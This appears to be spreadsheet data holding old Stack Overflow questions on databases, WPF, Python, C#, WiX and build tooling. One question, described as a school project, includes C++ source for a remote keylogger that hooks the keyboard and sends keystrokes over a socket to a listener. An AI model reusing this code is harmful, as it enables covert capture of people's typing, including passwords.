&lt;p&gt;Well, I thought that it could be some problem with the conversion of the 
file, so I picked up a brand new one and filled it with some information. Tried 
again, same error!!&lt;/p&gt;
&lt;p&gt;Then I tried the approach with ".udl" files, same error!
Then I tried to test on different machines:
- My own (Windows Vista SP1)
- My colleagues (Windows XP SP2)
- The IS Server (Windows Server 2003 x64 SP2)&lt;/p&gt;
&lt;p&gt;And the error persists. I found it so easy to reproduce the error, that I'm a 
bit surprised that I didn't find anything about it by googling around!&lt;/p&gt;
&lt;p&gt;Can somebody help me?&lt;/p&gt;
&lt;p&gt;Thanks in advance,
Rafael&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding xml comments to methods, properties, etc quickly in vs 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume I have 10 Methods and 10 Properties.  Is there a way to add the xml comments (///) to all 10 Methods and 10 Properties at once in VS 2008 or do I have to type /// for each one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you show a list of tables in another database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select * from sys.tables
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in mssql to show a list of all tables in the current database. Is there anyways I can use similar syntax to show list of tables in another database?&lt;/p&gt;
&lt;p&gt;Say I am using A with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use A
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;statement, can I show tables in database B?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can my build stipulate that my code coverage never get worse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using hudson CI to manage a straight java web project, using ant to build.&lt;/p&gt;
&lt;p&gt;I would like to mandate that the unit test coverage never be worse than the previous build, thereby making sure any new code is always tested, or at least the coverage is continually improving.&lt;/p&gt;
&lt;p&gt;Is there a hudson plugin that works this way?&lt;/p&gt;
&lt;p&gt;Edit: I am currently using Emma, but would be willing to switch to another coverage app.&lt;/p&gt;
&lt;p&gt;Also, as a clarification, I've seen the thresholds in some Hudson plugins, but that's not exactly what I'm after. For example what I'd like is that if coverage for Build #12 was 46% overall, and someone checked in Build #13 with 45% coverage, the build would break.&lt;/p&gt;
&lt;p&gt;The reason I want to do this, is that I have a codebase with low test coverage. We don't have time to go back and retroactively write unit tests, but I'd like to make sure that the coverage keeps getting better.&lt;/p&gt;
&lt;p&gt;UPDATE: Dan pointed out an edge case with my plan that will definitely be a problem. I think I need to rethink whether this is even a good idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to retrieve sender in click handler from toolbartray or other control in wpf?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;XAML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ToolBarTray Name="tlbTray" ButtonBase.Click="tlbTray_Click"&amp;gt;
&amp;lt;ToolBar Name="tlbFile"&amp;gt;
    &amp;lt;Button Name="btnOpen"&amp;gt;&amp;lt;Image Source="images\folder.png" Stretch="None" /&amp;gt;&amp;lt;/Button&amp;gt;
    &amp;lt;Button Name="btnSave"&amp;gt;&amp;lt;Image Source="images\disk.png" Stretch="None" /&amp;gt;&amp;lt;/Button&amp;gt;
&amp;lt;/ToolBar&amp;gt;
&amp;lt;/ToolBarTray&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void tlbTray_Click(object sender, RoutedEventArgs e)
{
  // How to get the name of the button or control that triggered the event
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As commented in the method. How do I get the name of the button or control that triggered the event. Or I'm handling this the wrong way? I just want to route all click events to that one method and decide what to do from there...&lt;/p&gt;
&lt;p&gt;Thanks! ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I split "lastname, firstname" into separate strings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whats the best way to separate the string, "Parisi, Kenneth" into "Kenneth" and "Parisi"?
&lt;br&gt;I am still learning how to parse strings with these regular expressions, but not too familiar with how to set vars equal to the matched string &amp;amp; output of the matched (or mismatched) string.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC pattern in .NET: Can View call Exceptions in Model?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the MVC pattern in a .NET winform app.  There are places in the Controller that can cause an exception.  Rather than catching the exception and dislpaying a messagebox, which is a View responsibility, I do nothing in the Controller and let the View wrap that area in a try/catch.  So far, there isn't anything that needs to be done in these exceptions except display a nice message to the user.  That won't always be the case.  The View than displays the exception error in a messagebox.   I don't like this because the Exception classes come from the model.  So, the View is reaching directly into the Model to gain access to the exceptions.  But, how else can it be done and still follow the MVC pattern?&lt;/p&gt;
&lt;p&gt;I could have the Controller handle the exception and throw a string back to the UI.  How is that done though?  If functionA returns void, I don't want to modify its return type just to appaise the View.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Authenticating against Active Directory with Java on Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple task of authenticating against Active Directory using Java. Just verifying credentials and nothing else. Let's say my domain is "fun.xyz.tld", OU path is unknown, and username/password is testu/testp. &lt;/p&gt;
&lt;p&gt;I know there's a few Java libraries out there that simplify this task, but I wasn't successful at implementing them. Most examples that I've found addressed LDAP in general, not specifically Active Directory. Issuing LDAP request means sending an OU path in it, which I don't have. Also, the application that issues LDAP request should be already bound to Active Directory in order to access it... Insecure, since the credentials would have to be stored someplace discoverable. I would like a test bind with test credentials, if possible - this would mean that account is valid.&lt;/p&gt;
&lt;p&gt;Last, if possible, is there a way to make such authentication mechanism encrypted? I know that AD uses Kerberos, but not sure if Java's LDAP methods do.&lt;/p&gt;
&lt;p&gt;Does anyone has an example of working code? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008 IDE giving 5 second latency when switching tabs between aspx and aspx.cs , how come?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have VS2008 (SP1)  installed on a XP sp2 laptop.&lt;/p&gt;
&lt;p&gt;One thing weired on IDE, I don't know how to fix it.&lt;/p&gt;
&lt;p&gt;I'm programming a web application, have many tabs openning at the same time. When I switch from aspx to aspx.cs back and forth, I always get about 5 seconds delay before I can type the keyboard.&lt;/p&gt;
&lt;p&gt;I thought this might relate to some background layout rendering process, but I never open "Design" screen fro aspx page, I always open "Source" screen. This 5 seconds delay annoying a lot. &lt;/p&gt;
&lt;p&gt;Any configurations? suggestions?&lt;/p&gt;
&lt;p&gt;Thanks a lot&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Elegant ways to support equivalence ("equality") in Python classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When writing custom classes it is often important to allow equivalence by means of the &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; operators. In Python, this is made possible by implementing the &lt;code&gt;__eq__&lt;/code&gt; and &lt;code&gt;__ne__&lt;/code&gt; special methods, respectively. The easiest way I've found to do this is the following method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Foo:
    def __init__(self, item):
        self.item = item
    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False
    def __ne__(self, other):
        return not self.__eq__(other)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you know of more elegant means of doing this? Do you know of any particular disadvantages to using the above method of comparing &lt;code&gt;__dict__&lt;/code&gt;s?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: A bit of clarification--when &lt;code&gt;__eq__&lt;/code&gt; and &lt;code&gt;__ne__&lt;/code&gt; are undefined, you'll find this behavior:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; a = Foo(1)
&amp;gt;&amp;gt;&amp;gt; b = Foo(1)
&amp;gt;&amp;gt;&amp;gt; a is b
False
&amp;gt;&amp;gt;&amp;gt; a == b
False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is, &lt;code&gt;a == b&lt;/code&gt; evaluates to &lt;code&gt;False&lt;/code&gt; because it really runs &lt;code&gt;a is b&lt;/code&gt;, a test of identity (i.e., "Is &lt;code&gt;a&lt;/code&gt; the same object as &lt;code&gt;b&lt;/code&gt;?").&lt;/p&gt;
&lt;p&gt;When &lt;code&gt;__eq__&lt;/code&gt; and &lt;code&gt;__ne__&lt;/code&gt; are defined, you'll find this behavior (which is the one we're after):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; a = Foo(1)
&amp;gt;&amp;gt;&amp;gt; b = Foo(1)
&amp;gt;&amp;gt;&amp;gt; a is b
False
&amp;gt;&amp;gt;&amp;gt; a == b
True
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>onbeforeunload in Opera</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the code that netadictos posted to the question &lt;a href="http://stackoverflow.com/questions/333665/"&gt;here&lt;/a&gt;.  All I want to do is to display a warning when a user is navigating away from or closing a window/tab.&lt;/p&gt;
&lt;p&gt;The code that netadictos posted seems to work fine in IE7, FF 3.0.5, Safari 3.2.1, and Chrome but it doesn't work in Opera v9.63.  Does anyone know of way of doing the same thing in Opera?&lt;/p&gt;
&lt;p&gt;Thx, Trev&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make a fully customizable hosted ASP.NET MVC application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is related to my previous question regarding serving static html files but that doesn't seem to be a good solution, &lt;/p&gt;
&lt;p&gt;I want to make a fully customizable ASP.NET MVC application as a hosted service. See allowing the user to customize the look/feel of their own page but it is still dynamic, meaning the data is hosted in the central database. &lt;/p&gt;
&lt;p&gt;I looked at the "theme" or "skin" in ASP.NET but I don't think it is customizable enough. It seems only the developer can add new themes. I want to have something like the theme editor in WordPress so you can just change the look in anyway you want from a web-based interface.&lt;/p&gt;
&lt;p&gt;I wonder how the theme files will be stored for the popular blogging platform? Are they stored in database or a file in filesystem? I prefer to store it in database, because if it is in filesystem it will have scalability problem. Each user will be tired to a particular web server and I have to determine how much disk space for each webserver.&lt;/p&gt;
&lt;p&gt;I thought of doing something like the old MovableType, to generate static HTML when you add new post. This solution is problematic as well, because the flexibility depends on the complexity of the template engine.&lt;/p&gt;
&lt;p&gt;Ideas? Suggestions?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>winsock missing data c++ win32</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing an application that needs to send data over a network. I have the application completed but there is a problem with sending the data. Every time I send a piece of data, it is cut off after 4 characters and the rest is garbage. The application is a remote keylogger I am writing for a school project, which requires you to demonstrate the usage of hooks and winsock. We are allowed to ask for help on forums. Any help would be appreciated! &lt;/p&gt;
&lt;p&gt;Here' the code:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Server:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; // rkl.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "rkl.h"
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
SOCKET kSock;
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam);
int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
WSAData wsdata; 
WORD wsver=MAKEWORD(2, 0); 
int nret=WSAStartup(wsver, &amp;amp;wsdata); 
if(nret != 0)
{
    MessageBoxA(0,"Error 0","Error",MB_OK);
WSACleanup(); 
return -1;
}
kSock=socket(AF_INET, SOCK_STREAM, 0);
if(kSock == INVALID_SOCKET)
{
MessageBoxA(0,"Error 1","Error",MB_OK);
return -1;
}
sockaddr_in sin;
sin.sin_port=htons(808);
sin.sin_addr.s_addr=inet_addr("127.0.0.1");
sin.sin_family=AF_INET;
if(connect(kSock,(sockaddr*)&amp;amp;sin, sizeof(sin)) == SOCKET_ERROR)
{ 
MessageBoxA(0,"Error 2","Error",MB_OK);
WSACleanup(); 
return -1;
}
HHOOK keyboardHook = SetWindowsHookEx(
    	WH_KEYBOARD_LL,
    	keyboardHookProc,
    	hInstance,
    	0);
char buf1[256];
char* buf = buf1;
buf = "Test";
send(kSock,buf,sizeof(buf),0);
MessageBoxA(0,"Press ok to stop logging.","Waiting...",MB_OK);
closesocket(kSock);
return 0;
}
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
    if (wParam == WM_KEYDOWN) {
    	char* buf;
char tl[256];
buf = tl;
buf = itoa(p-&amp;gt;vkCode,buf,10);
int tmp;
tmp = atoi(buf);
if(tmp != 0)
{
    	switch (tmp) {
case VK_BACK:      buf =  "&amp;lt;BACKSPACE&amp;gt;";       break;
case VK_TAB:      buf =  "&amp;lt;TAB&amp;gt;";       break;
case VK_CLEAR:      buf =  "&amp;lt;CLEAR&amp;gt;";       break;
case VK_RETURN:      buf =  "&amp;lt;ENTER&amp;gt;";       break;
case VK_SHIFT:      buf =  "&amp;lt;SHIFT&amp;gt;";       break;
case VK_CONTROL:      buf =  "&amp;lt;CTRL&amp;gt;";       break;
case VK_MENU:      buf =  "&amp;lt;ALT&amp;gt;";       break;
case VK_PAUSE:      buf =  "&amp;lt;PAUSE&amp;gt;";       break;
case VK_CAPITAL:      buf =  "&amp;lt;CAPS LOCK&amp;gt;";       break;
case VK_ESCAPE:      buf =  "&amp;lt;ESC&amp;gt;";       break;
case VK_SPACE:      buf =  "&amp;lt;SPACEBAR&amp;gt;";       break;
case VK_PRIOR:      buf =  "&amp;lt;PAGE UP&amp;gt;";       break;
case VK_NEXT:      buf =  "&amp;lt;PAGE DOWN&amp;gt;";       break;
case VK_END:      buf =  "&amp;lt;END&amp;gt;";       break;
case VK_HOME:      buf =  "&amp;lt;HOME&amp;gt;";       break;
case VK_LEFT:      buf =  "&amp;lt;LEFT ARROW&amp;gt;";       break;
case VK_UP:      buf =  "&amp;lt;UP ARROW&amp;gt;";       break;
case VK_RIGHT:      buf =  "&amp;lt;RIGHT ARROW&amp;gt;";       break;
case VK_DOWN:      buf =  "&amp;lt;DOWN ARROW&amp;gt;";       break;
case VK_SELECT:      buf =  "&amp;lt;SELECT&amp;gt;";       break;
case VK_PRINT:      buf =  "&amp;lt;PRINT&amp;gt;";       break;
case VK_EXECUTE:      buf =  "&amp;lt;EXECUTE&amp;gt;";       break;
case VK_SNAPSHOT:      buf =  "&amp;lt;PRINT SCREEN&amp;gt;";       break;
case VK_INSERT:      buf =  "&amp;lt;INSERT&amp;gt;";       break;
case VK_DELETE:      buf =  "&amp;lt;DEL&amp;gt;";       break;
case VK_HELP:      buf =  "&amp;lt;HELP&amp;gt;";       break;
case VK_LWIN:      buf =  "&amp;lt;Left Windows key&amp;gt;";       break;
case VK_RWIN :      buf =  "&amp;lt;Right Windows key&amp;gt;";       break;
case VK_APPS:      buf =  "&amp;lt;Applications key&amp;gt;";       break;
case VK_SLEEP:      buf =  "&amp;lt;Computer Sleep key&amp;gt;";       break;
case VK_NUMPAD0:      buf =  "0";       break;
case VK_NUMPAD1:      buf =  "1";       break;
case VK_NUMPAD2:      buf =  "2";       break;
case VK_NUMPAD3:      buf =  "3";       break;
case VK_NUMPAD4:      buf =  "4";       break;
case VK_NUMPAD5:      buf =  "5";       break;
case VK_NUMPAD6:      buf =  "6";       break;
case VK_NUMPAD7:      buf =  "7";       break;
case VK_NUMPAD8:      buf =  "8";       break;
case VK_NUMPAD9:      buf =  "9";       break;
case VK_MULTIPLY:      buf =  "*";       break;
case VK_ADD:      buf =  "+";       break;
case VK_SEPARATOR:      buf =  "&amp;lt;Separator key&amp;gt;";       break;
case VK_SUBTRACT:      buf =  "-";       break;
case VK_DECIMAL:      buf =  ".";       break;
case VK_DIVIDE:      buf =  "/";       break;
case VK_F1:      buf =  "&amp;lt;F1&amp;gt;";       break;
case VK_F2:      buf =  "&amp;lt;F2&amp;gt;";       break;
case VK_F3:      buf =  "&amp;lt;F3&amp;gt;";       break;
case VK_F4:      buf =  "&amp;lt;F4&amp;gt;";       break;
case VK_F5:      buf =  "&amp;lt;F5&amp;gt;";       break;
case VK_F6:      buf =  "&amp;lt;F6&amp;gt;";       break;
case VK_F7:      buf =  "&amp;lt;F7&amp;gt;";       break;
case VK_F8:      buf =  "&amp;lt;F8&amp;gt;";       break;
case VK_F9:      buf =  "&amp;lt;F9&amp;gt;";       break;
case VK_F10:      buf =  "&amp;lt;F10&amp;gt;";       break;
case VK_F11:      buf =  "&amp;lt;F11&amp;gt;";       break;
case VK_F12:      buf =  "&amp;lt;F12&amp;gt;";       break;
case VK_NUMLOCK:      buf =  "&amp;lt;NUM LOCK&amp;gt;";       break;
case VK_SCROLL:      buf =  "&amp;lt;SCROLL LOCK&amp;gt;";       break;
case VK_LSHIFT:      buf =  "&amp;lt;Left SHIFT&amp;gt;";       break;
case VK_RSHIFT:      buf =  "&amp;lt;Right SHIFT&amp;gt;";       break;
case VK_LCONTROL:      buf =  "&amp;lt;Left CONTROL&amp;gt;";       break;
case VK_RCONTROL:      buf =  "&amp;lt;Right CONTROL&amp;gt;";       break;
case VK_LMENU:      buf =  "&amp;lt;Left MENU&amp;gt;";       break;
case VK_RMENU:      buf =  "&amp;lt;Right MENU&amp;gt;";       break;
case VK_BROWSER_BACK:      buf =  "&amp;lt;Browser Back key&amp;gt;";       break;
case VK_BROWSER_FORWARD:      buf =  "&amp;lt;Browser Forward key&amp;gt;";       break;
case VK_BROWSER_REFRESH:      buf =  "&amp;lt;Browser Refresh key&amp;gt;";       break;
case VK_BROWSER_STOP:      buf =  "&amp;lt;Browser Stop key&amp;gt;";       break;
case VK_BROWSER_SEARCH:      buf =  "&amp;lt;Browser Search key &amp;gt;";       break;
case VK_BROWSER_FAVORITES:      buf =  "&amp;lt;Browser Favorites key&amp;gt;";       break;
case VK_BROWSER_HOME:      buf =  "&amp;lt;Browser Start and Home key&amp;gt;";       break;
case VK_VOLUME_MUTE:      buf =  "&amp;lt;Volume Mute key&amp;gt;";       break;
case VK_VOLUME_DOWN:      buf =  "&amp;lt;Volume Down key&amp;gt;";       break;
case VK_VOLUME_UP:      buf =  "&amp;lt;Volume Up key&amp;gt;";       break;
case VK_MEDIA_NEXT_TRACK:      buf =  "&amp;lt;Next Track key&amp;gt;";       break;
case VK_MEDIA_PREV_TRACK:      buf =  "&amp;lt;Previous Track key&amp;gt;";       break;
case VK_MEDIA_STOP:      buf =  "&amp;lt;Stop Media key&amp;gt;";       break;
case VK_MEDIA_PLAY_PAUSE:      buf =  "&amp;lt;Play/Pause Media key&amp;gt;";       break;
case VK_LAUNCH_MAIL:      buf =  "&amp;lt;Start Mail key&amp;gt;";       break;
case VK_LAUNCH_MEDIA_SELECT:      buf =  "&amp;lt;Select Media key&amp;gt;";       break;
case VK_LAUNCH_APP1:      buf =  "&amp;lt;Start Application 1 key&amp;gt;";       break;
case VK_LAUNCH_APP2:      buf =  "&amp;lt;Start Application 2 key&amp;gt;";       break;
case VK_OEM_1:      buf =  "&amp;lt;;:' key &amp;gt;";       break;
case VK_OEM_PLUS:      buf =  "+";       break;
case VK_OEM_COMMA:      buf =  ",";       break;
case VK_OEM_MINUS:      buf =  "-";       break;
case VK_OEM_PERIOD:      buf =  ".";       break;
case VK_OEM_2:      buf =  "&amp;lt;/?' key &amp;gt;";       break;
case VK_OEM_3:      buf =  "&amp;lt;`~' key &amp;gt;";       break;
case VK_OEM_4:      buf =  "&amp;lt;[{' key&amp;gt;";       break;
case VK_OEM_5:      buf =  "&amp;lt;\|' key&amp;gt;";       break;
case VK_OEM_6:      buf =  "&amp;lt;]}' key&amp;gt;";       break;
case VK_OEM_7:      buf =  "&amp;lt;single-quote/double-quote' key&amp;gt;";       break;
case VK_OEM_CLEAR:      buf =  "&amp;lt;Clear&amp;gt;";       break;
    		default:
    		buf[0] = char(tmp);
    		buf[1] = char(0);
    		buf[2] = char(0);
    		buf[3] = char(0);
    		buf[4] = char(0);
    	    buf[5] = char(0);
    		buf[6] = char(0);
    		buf[7] = char(0);
    		buf[8] = char(0);
    	}
send(kSock,buf,sizeof(buf),0);
}
    return CallNextHookEx(NULL, nCode, wParam, lParam);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Client:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// lkv.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include &amp;lt;windows.h&amp;gt; 
#include &amp;lt;iostream&amp;gt;
int main()
{
WSAData wsdata;
WORD wsver=MAKEWORD(2, 0); 
int nret=WSAStartup(wsver, &amp;amp;wsdata); 
if(nret != 0){ 
std::cout&amp;lt;&amp;lt;"Startup failed, error code: "&amp;lt;&amp;lt;WSAGetLastError(); 
WSACleanup(); 
return -1;
}
std::cout&amp;lt;&amp;lt;"Init success\n";
SOCKET kSock=socket(AF_INET, SOCK_STREAM, 0);
if(kSock == INVALID_SOCKET){
std::cout&amp;lt;&amp;lt;"Socket init failed";
return -1;
}
std::cout&amp;lt;&amp;lt;"Socket initialized\n";
sockaddr_in sin;
sin.sin_port=htons(808);
sin.sin_addr.s_addr=INADDR_ANY;
sin.sin_family=AF_INET;
if(bind(kSock,(sockaddr*)&amp;amp;sin, sizeof(sin)) == SOCKET_ERROR){
std::cout&amp;lt;&amp;lt;"Failed to bind\n";
WSACleanup(); 
return -1;
}
std::cout&amp;lt;&amp;lt;"Bind successful!\n";
while (listen(kSock, SOMAXCONN) == SOCKET_ERROR); 
SOCKET client;
int len = sizeof(sin);
client=accept(kSock, (sockaddr*)&amp;amp;sin, &amp;amp;len);
std::cout&amp;lt;&amp;lt;"Connection established!\n";
int i;
for(;;)
{
char buf[22];
recv(client, buf, sizeof(buf), 0); 
std::cout &amp;lt;&amp;lt; buf;
}
closesocket(client); 
closesocket(kSock);
WSACleanup();
return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Create a query dynamically through code in MSAccess 2003 [VBA]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I need to create a query in MSAccess 2003 through code (a.k.a. VB) -- how can I accomplish this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for alternative Collaberative Developing Environements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested in Collaberative Developing and I was wondering if there are alternative solutions than using &lt;a href="http://www.vimeo.com/1653402" rel="nofollow"&gt;UNA (example video)&lt;/a&gt; from N-Brain. Free would be even better, but I guess that's not an option which such technology.&lt;/p&gt;
&lt;p&gt;PS: The main future I'm looking for is working real-time with multiple persons in the same code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database schema design</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm quite new to database design and have some questions about best practices and would really like to learn.
I am designing a database schema, I have a good idea of the requirements and now its a matter of getting it into black and white.&lt;/p&gt;
&lt;p&gt;In this pseudo-database-layout, I have a table of customers, table of orders and table of products.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TBL_PRODUCTS:&lt;/strong&gt;&lt;BR&gt;
ID&lt;BR&gt;
Description&lt;BR&gt;
Details&lt;BR&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TBL_CUSTOMER:&lt;/strong&gt;&lt;BR&gt;
ID&lt;BR&gt;
Name&lt;BR&gt;
Address&lt;BR&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TBL_ORDER:&lt;/strong&gt;&lt;BR&gt;
ID&lt;BR&gt;
TBL_CUSTOMER.ID&lt;BR&gt;
prod1&lt;BR&gt;
prod2&lt;BR&gt;
prod3&lt;BR&gt;
etc&lt;BR&gt;&lt;/p&gt;
&lt;p&gt;Each 'order' has only one customer, but can have any number of 'products'.&lt;/p&gt;
&lt;p&gt;The problem is, in my case, the products for a given order can be any amount (hundreds for a single order) on top of that, each product for an order needs more than just a 'quantity' but can have values that span pages of text for a specific product for a specific order.
My question is, how can I store that information?&lt;/p&gt;
&lt;p&gt;Assuming I can't store a variable length array as single field value, the other option is to have a string that is delimited somehow and split by code in the application.
An order could have say 100 products, each product having either only a small int, or 5000 characters or free text (or anything in between), unique only to that order.&lt;/p&gt;
&lt;p&gt;On top of that, each order must have it's own audit trail as many things can happen to it throughout it's lifetime.
An audit trail would contain the usual information - user, time/date, action and can be any length.
Would I store an audit trail for a specific order in it's own table (as they could become quite lengthy) created as the order is created?&lt;/p&gt;
&lt;p&gt;Are there any places where I could learn more about techniques for database design?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Messaging, Queues and ESB's - I know where I want to be but not how to get there</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;To cut a long story short, I am working on a project where we are rewriting a large web application for all the usual reasons. The main aim of the rewrite is to separate this large single application running on single server into many smaller decoupled applications, which can be run on many servers.&lt;/p&gt;
&lt;p&gt;Ok here's what I would like:&lt;/p&gt;
&lt;p&gt;I would like &lt;code&gt;HTTP&lt;/code&gt; to be the main transport mechanism. When one application for example the CMS has been updated it will contact the broker via http and say &lt;em&gt;&lt;code&gt;"I've changed"&lt;/code&gt;&lt;/em&gt;, then the broker will send back a &lt;em&gt;&lt;code&gt;200 OK&lt;/code&gt;&lt;/em&gt; to say &lt;em&gt;&lt;code&gt;"thanks I got the message"&lt;/code&gt;&lt;/em&gt;. &lt;/p&gt;
&lt;p&gt;The broker will then look on its list of other applications who wanted to hear about CMS changes and pass the message to the url that the application left when it told the broker it wanted to hear about the message. &lt;/p&gt;
&lt;p&gt;The other applications will return &lt;code&gt;200 OK&lt;/code&gt; when they receive the message, if not the broker keeps the message and queues it up for the next time someone tries to contact that application.&lt;/p&gt;
&lt;p&gt;The problem is I don't even know where to start or what I need to make it happen. I've been looking at &lt;kbd&gt;XMPP&lt;/kbd&gt;, &lt;kbd&gt;ActiveMQ&lt;/kbd&gt;, &lt;kbd&gt;RabbitMQ&lt;/kbd&gt;, &lt;kbd&gt;Mule ESB&lt;/kbd&gt; etc. and can see I could spend the next year going around in circles with this stuff.&lt;/p&gt;
&lt;p&gt;Could anyone offer any advice from personal experience as I would quite like to avoid learning lessons the hard way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to do object (with its attributes) serializing to xml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Create a class (call it FormElement).  That class should have some properties like the metadata they have with data elements (name, sequence number, valueâ€”which is just a string, etc).&lt;/p&gt;
&lt;p&gt;This class has as attributes of type Validation Application Block Validation classes.&lt;/p&gt;
&lt;p&gt;I want to serialize it to xml and deserialize it.  Verify that all properties of the class including the validation application block attributes survive serialization.&lt;/p&gt;
&lt;p&gt;some suggestion?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WiX generated MSI is not compressed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use WiX3 to generate MSI installation package. 
I have specified comression flag on in both the &lt;code&gt;&amp;lt;Package&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;Media&amp;gt;&lt;/code&gt; elements:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Package InstallerVersion="200" Compressed="yes"/&amp;gt;
&amp;lt;Media Id="1" Cabinet="MySetup.cab" EmbedCab="yes" CompressionLevel="high" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but the resulting MSI is not compressed at all - WinZip compressed it from 2M down to 600K.&lt;/p&gt;
&lt;p&gt;Am I missing something? &lt;/p&gt;
&lt;p&gt;I am using VS2008 btw.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't operator == be applied to generic types in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to the documentation of the &lt;code&gt;==&lt;/code&gt; operator in &lt;a href="http://msdn.microsoft.com/en-us/library/53k8ybth.aspx"&gt;MSDN&lt;/a&gt;, &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;For predefined value types, the
  equality operator (==) returns true if
  the values of its operands are equal,
  false otherwise. For reference types
  other than string, == returns true if
  its two operands refer to the same
  object. For the string type, ==
  compares the values of the strings.
  User-defined value types can overload
  the == operator (see operator). So can
  user-defined reference types, although
  &lt;strong&gt;by default == behaves as described
  above for both predefined and
  user-defined reference types.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So why does this code snippet fail to compile?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Compare&amp;lt;T&amp;gt;(T x, T y) { return x == y; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the error &lt;em&gt;Operator '==' cannot be applied to operands of type 'T' and 'T'&lt;/em&gt;. I wonder why, since as far as I understand the &lt;code&gt;==&lt;/code&gt; operator is predefined for all types?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Thanks everybody. I didn't notice at first that the statement was about reference types only. I also thought that bit-by-bit comparison is provided for all value types, which I now know is &lt;em&gt;not&lt;/em&gt; correct.&lt;/p&gt;
&lt;p&gt;But, in case I'm using a reference type, would the the &lt;code&gt;==&lt;/code&gt; operator use the predefined reference comparison, or would it use the overloaded version of the operator if a type defined one?&lt;/p&gt;
